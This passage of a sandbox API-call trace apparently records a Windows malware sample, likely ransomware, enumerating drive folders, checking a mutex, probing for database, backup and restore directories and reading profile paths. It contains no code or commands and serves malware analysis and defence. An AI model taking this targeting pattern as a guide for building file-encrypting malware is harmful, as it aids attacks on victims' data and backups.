nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0103.654] GetLastError () returned 0x12 [0103.655] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0103.655] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.655] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.655] GlobalUnlock (hMem=0x45000c) returned 0 [0103.655] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.655] GlobalLock (hMem=0x450004) returned 0x588000 [0103.655] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.655] GlobalUnlock (hMem=0x45000c) returned 0 [0103.655] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.655] GlobalUnlock (hMem=0x450004) returned 0 [0103.655] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x575308 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f4Bw=XvJqdf6BYP1mVw.scarry", cAlternateFileName="F4BW_X~1.SCA")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0103.656] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0103.656] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac8 | out: lpLocalFileTime=0x18fac8) returned 1 [0103.656] FileTimeToDosDateTime (in: lpFileTime=0x18fac8, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.656] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.656] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.656] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.656] GlobalLock (hMem=0x450004) returned 0x588000 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.657] SysReAllocStringLen (in: pbstr=0x18fac4*=0x0, psz="C:\\PerfLogs", len=0xb | out: pbstr=0x18fac4*="C:\\PerfLogs") returned 1 [0103.657] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.657] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.657] GlobalUnlock (hMem=0x450004) returned 0 [0103.657] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.657] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.657] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.657] GlobalUnlock (hMem=0x450004) returned 0 [0103.657] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.657] GlobalUnlock (hMem=0x45000c) returned 0 [0103.657] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft\\Exchange Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="䱈@ⷘWⶬW企@\x18㵤V頻\x18\x1b")) returned 0xffffffff [0103.657] GetLastError () returned 0x3 [0103.657] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.657] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=26, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0103.658] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft SQL Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@ⶔW企@\x18㶬V頻\x181")) returned 0xffffffff [0103.658] GetLastError () returned 0x2 [0103.658] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=21, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0103.659] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Firebird", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@練W企@\x18㡤X頻\x18;")) returned 0xffffffff [0103.659] GetLastError () returned 0x2 [0103.659] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 8 [0103.659] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\MSSQL.1", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥼X頻\x18D")) returned 0xffffffff [0103.659] GetLastError () returned 0x2 [0103.660] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.660] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@건V企@\x18ⶔW頻\x18j")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.661] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Adobe", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@紌X企@\x18㥔X頻\x18q")) returned 0xffffffff [0103.661] GetLastError () returned 0x2 [0103.661] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="adobe\\ⶐWP") returned 6 [0103.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.661] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Oracle", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥼X頻\x18y")) returned 0xffffffff [0103.663] GetLastError () returned 0x2 [0103.664] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.664] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Archive", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㶬V企@\x18㤬X頻\x18\x81")) returned 0xffffffff [0103.664] GetLastError () returned 0x2 [0103.664] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.665] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Backup", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥔X頻\x18\x88")) returned 0xffffffff [0103.665] GetLastError () returned 0x2 [0103.665] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="backup㤨X ") returned 6 [0103.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.665] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Reserv", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㶬V企@\x18㥼X頻\x18\x8f")) returned 0xffffffff [0103.665] GetLastError () returned 0x2 [0103.666] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="reserv㥐X ") returned 6 [0103.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.666] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Restore", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㤬X頻\x18\x97")) returned 0xffffffff [0103.666] GetLastError () returned 0x2 [0103.666] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.667] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.667] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.667] GlobalUnlock (hMem=0x45000c) returned 0 [0103.667] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.667] GlobalLock (hMem=0x450004) returned 0x588000 [0103.667] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.667] GlobalUnlock (hMem=0x45000c) returned 0 [0103.667] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.667] GlobalUnlock (hMem=0x450004) returned 0 [0103.669] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.669] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.669] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.669] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 46 [0103.670] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.670] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 15 [0103.670] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.670] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=11, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 11 [0103.670] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.670] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.670] GlobalUnlock (hMem=0x450004) returned 0 [0103.670] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.671] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.671] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.671] GlobalUnlock (hMem=0x450004) returned 0 [0103.671] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.671] GlobalUnlock (hMem=0x45000c) returned 0 [0103.671] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 15 [0103.671] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=11, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 11 [0103.671] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 9 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 18 [0103.672] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.672] MultiByteToWideChar (in: CodePage=0x4e4, 